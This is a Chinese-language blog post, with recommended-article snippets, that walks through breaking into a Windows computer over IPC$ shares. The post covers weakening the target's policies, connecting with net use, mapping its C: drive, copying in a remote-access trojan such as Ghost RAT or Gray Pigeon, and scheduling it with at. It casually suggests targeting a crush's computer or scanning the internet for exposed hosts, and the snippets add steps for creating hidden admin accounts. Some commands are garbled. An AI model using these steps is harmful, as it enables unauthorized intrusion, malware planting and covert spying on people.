在对方电脑建立IPC连接, 利用IPC$入侵 运行木马

最新推荐文章于 2022-05-06 00:11:09 发布
最新推荐文章于 2022-05-06 00:11:09 发布
阅读量654 收藏 8
点赞数
文章标签: 操作系统

第一大步:  IPC漏洞的建立

1)在目标主机上设置组策略:開始->执行-〉gpedit.msc

2)计算机配置->windows配置-〉本地策略-〉安全选项

3)在安全选项中,

将网络訪问:本地账户的共享和安全模式 设置为:经典——本地用户以自己的身份验证。将账户:使用空白password的本地账户仅仅同意进行控制台登录设置为 禁用。


这样就建立了IPC漏洞。


假设你能接触到目标主机的话, 然后你懂的。 仅仅要在你女神主机上开了这个小漏洞就好了!。!

假设你接触不到的话,就去网上探測一些存在IPC漏洞的主机玩玩,利用一些探測工具,找到后进行下面的操作!

第二大步:IPC漏洞的利用

下面为在本机上操作

1 连接对方主机:


注意 假设你是从网上扫到的具有IPC漏洞的主机,可能会实username和password 须要下面方法与目标主机建立IPC$连接

net use \\IP\ipc$ "username" /user:"password"      ( 有3个空格)

  


2将目标主机的C:盘映射为本地主机上的Z:盘



注意  Z盘不要与其他盘名反复  是任意明名的 能够不用Z  且 空格不要搞错

显示Z盘信息例如以下


3 双击打开Z盘 传入木马   木马就自己配置生成了 网上非常多 比方 ghost远控 灰鸽子什么的  请自重不要做犯法的事情



4

此时。目标主机的C盘中已存在ghost远控的muma.exe程序,使用Dos命令加入启动事件
首先查询对方主机眼下时间


加入启动事件:


在下午5点45分的时候将会运行我们的muma.exe!!!


5 断开连接

键入“net use * /del”命令断开全部IPC$连接,


总结:

就是这么简单。 可是大家千万不要做坏事,本篇博客仅作学习研究计算机安全知识。如若用于其他用途,或去用了做坏事,后果自负额。转载请注明

by hnust_xiehonghao

 

weixin_34224941
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一份详尽的IPC$入侵资料
马马的专栏
12-29 661
[ccbirds入门级教程]--各个击破1--ipc$入侵 一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在
IPC$经典入侵步骤和常用net命令
河北正定欢迎您-少占鱼
10-23 4731
ipc$经典入侵步骤:1、net use [url=file://ip/ipc$]\\ip\ipc$[/url] 密码 /user:用户名2、copy 文件名 [url=file://ip/c$]\\ip\c$[/url]3、net  time [url=file://ip/]\\ip[/url]4、at [url=file://ip/]\\ip[/url] 时间 命令5、入侵成功,连接你的肉鸡常
IPC $(空连接)及其造成的危险
qq_45521281的博客
04-28 3264
文章目录基本简介功能其他空会话建立应用关于操作所用端口复制文件命令限制共享完成命令附录命名管道默认共享 使用命令 net use url=file://\\IP\ipc$\\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。 功 能:共享 “命名管道” 的资源 要 求:需要目标开放ipc$ 应 用:查看远程主机的共享资源 基本简...
【网络安全学习实践】Windows环境下针对445端口漏洞爆破IPC$链接进行木马植入的模拟与防护
bay_Tong桐小白的博客
12-19 2680
Windows环境下针对445端口漏洞爆破IPC$链接进行木马植入的模拟与防护,本实践模拟简单的黑客木马入侵,旨在理解木马入侵的原理与过程,并针对性做出防范与部署
IPC连接漏洞
WannaCry_reboot
04-08 902
net use \\ip\ipc$ " " /user:" " 建立IPC空链接 。 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空), 并且开了139端口,但没开防火墙的机子。 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两...
Windows系统口令扫描之——使用NTScan扫描Windows口令
lucia的博客
03-03 6050
口令扫描攻击有两种方式 一种是不知道用户名称,猜测性暴力攻击 另一种是通过各种工具或手段收集用户信息,利用收集的信息实施攻击 口令扫描获取用户的账号名称方法 利用网络工具获取: 可以利用目标主机的finger命令查询功能获取信息。当使用finger命令时,主机系统会将保存的用户资料(用户名,登陆时间)显示在终端或计算机上 通过网络获取用户相关信息: 用户通常使用相同的名字注册电子邮箱、blog即论坛 获取主机中的习惯性账号: 习惯性账号主要包括操作系统账号和应用软件账号。在操作系统账号中,又
IPC共享通道命令
03-19
利用 IPC$, 连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了 ipc$ 共享,否则你是连接不上的),而利用这个空的连接连接者还可以得到目标主机上的用户列表(不过负责的管理...
网络安全培训视频教程-49.基于DOS命令的IPC简单入侵演示(下).rar
07-09
2007年的互联网状况可以说是不容乐观,自从轰动一时的“熊猫烧香”、“金猪”病毒、到臭名远洋的“灰鸽子”木马、还有最近的“ANI”漏洞真是让人很头疼!而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时...
网络安全培训视频教程-48.基于DOS命令的IPC简单入侵演示(上).rar
07-09
2007年的互联网状况可以说是不容乐观,自从轰动一时的“熊猫烧香”、“金猪”病毒、到臭名远洋的“灰鸽子”木马、还有最近的“ANI”漏洞真是让人很头疼!而且病毒不仅仅是造成互联网高危状态的主要因素,网络上同时...
红尘网安Ipc$【135】全自动扫描【网吧内网专用版】
12-25
用户在使用前需要先解压,然后按照指示运行工具,进行内网安全扫描。同时,可能还会有使用手册、许可证协议、技术支持联系方式等相关文件。 总的来说,红尘网安Ipc$【135】全自动扫描工具是针对网吧环境设计的安全...
2002-2006年系统经典利用漏洞:ipc$
01-22
2002-2006年系统经典利用漏洞:ipc$ 2. 实例演示-完整入侵过程 (1)纯DOS命令式 入侵 首先构建一个入侵的环境,虚拟机之间能相互通信,即可表示为互联网环境,再扫描,得到有 漏洞的计算机IP net use \\192.168.38.129 /u:administrator ------------连接扫描到有漏洞大远程计算机(扫描远程电脑无密码)如果有密码 net use \\192.168.38.129 “” /u:administrator--- “”中要输入远程电脑的密码。 net use --------查看是否成功连接 net time \\192.168.38.129 ----查看对方电脑时间 at \\192.168.38.129 09:05 net user hnqdwxf2003 123 /add ---用at命令建立一个用户hnqdwxf2003密码123 at \\192.168.38.129 net localgroup administrators hnqdwxf2003 /add --提升为管理员权限 copy 拖进来\\192.168.38.129\c$ net time \\192.168.38.129 ----再次查看对方电脑时间 at \\192.168.38.129 时间 regedit /s c:\1.reg 或将对方电脑共享盘映射到本机 net use p:\\192.168.38.129 \c$ at \\192.168.38.129 时间 c:\1.bat 等待对方电脑重启,再连连接3389。 (2)利用开启telnet工具 (3)利用远控工具
WINDOWS入侵常用命令
04-02
- `net use`:连接到远程共享资源或建立IPC$连接,如`net use x: \\IP\sharename`或`net use \\IP\IPC$ "password" /user:username`,这常用于权限提升和非法访问。 这些命令在合法的系统管理和非法的网络入侵中都...
远程控制---实验九:IPC远程植入木马
weixin_70557959的博客
05-06 3698
目录 一、实验目的及要求 二、实验原理 IPC 空会话 IPC建立的过程 木马 三、实验环境 四、实验步骤及内容 五、实验总结 六、分析与思考 一、实验目的及要求 1、掌握利用 IPC$入侵目标计算机(windows XP 或 windows 2003)的方法; 2、制作并植入远控木马来达到远程控制对方计算机; 二、实验原理 IPC IPC(Inter-Process Communication) 进程间通信,是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道
与另一台计算机建立ipc,利用IPC$开启他人电脑远程桌面
weixin_29079643的博客
07-25 912
利用IPC$开启他人电脑远程桌面》由会员分享,可在线阅读,更多相关《利用IPC$开启他人电脑远程桌面(2页珍藏版)》请在人人文库网上搜索。1、利用IPC$开启他人电脑远程桌面1.现在已经扫描到了一远程主机的管理员帐户administrator,密码为“123456”,可使用NET命令来建立IPC连接,“net use 172.20.89.10IPC$ 123456 /user:administ...
如何建立远程IPC$连接
热门推荐
无为
06-06 1万+
如何建立远程IPC$连接     要建立远程IPC$连接必须具备以下条件: 1、有超管的密码; 2、远程机开启了Sever服务项,一般都开了,除非是高手知道多一点; 3、了解以下Net Use之类的命令。 先用X-scan扫一下哪些机子有ipc漏洞,或者超管密码为空的。比如得到IP 192.168.0.1.。先Ping一下,确保他在线。然后在Windows
ipc$连接+计划任务
qq_44881113的博客
09-14 3891
IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的、用于数据交换的通道。 关于IPC$+计划任务的横向,我们的目的非常明确: (1)首先建立向目标主机的IPC$连接 (2)其次把命令执行的脚本传到目标主机 (3)再次创建计划任务在目标机器上执行命令脚本 (4)最后过河拆桥删除IPC$连接 当然想要用IPC$来横向是有条件的: (1)目标机器没有禁用IPC连接,没有什么防火防盗拦截IPC连接,没有什么防火防盗拦.
Windows IPC 连接详解
看不尽的尘埃——博客
01-19 1万+
前言 最近在看一些渗透测试的教程。打算把一些东西实践实践,加深一下印象! 今天就来看看IPC连接。虽然很老,但是很经典。 正文 什么是IPCIPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。   一、建立IPC连接 ...
Windows使用dos命令建立ipc$连接并远程拷贝文件
qq_29550537的博客
04-18 6127
使用dos命令建立 ipc$通道连接,并向远程主机发送文件 关于ipc$连接请查考:https://baike.baidu.com/item/空连接/1993355?fr=aladdin&fromid=9482475&fromtitle=ipc%24 1.建立ipc$连接 net use \\192.168.1.5\ipc$ "password" /user:"Administra...
IPC$入侵的4种方式
weixin_43456810的博客
12-31 2002
IPC$入侵的4种方式 1. 建立连接 net use \\192.168.1.111\IPC$ 只要在建立连接的命令最后添加del,即删除IPC$空连接的命令 2. 查看远程主机的当前时间 net time \\192.168.1.111 3. 查看远程主机的共享资源 net view \\192.168.1.111 4. 得到远程主机的NetBIOS的用户名列表 nbtstat -a 192.168.1.111 禁止IPC$共享 services.msc–>Server–>启动
建立ipc$连接的命令
最新发布
12-16
在Windows操作系统中,可以使用以下命令来建立IPC$连接: 1. 打开命令提示符窗口(CMD)。 2. 输入以下命令并按下回车键: ```bash net use \\目标计算机的IP地址\ipc$ /u:用户名 密码 ``` 其中,"目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值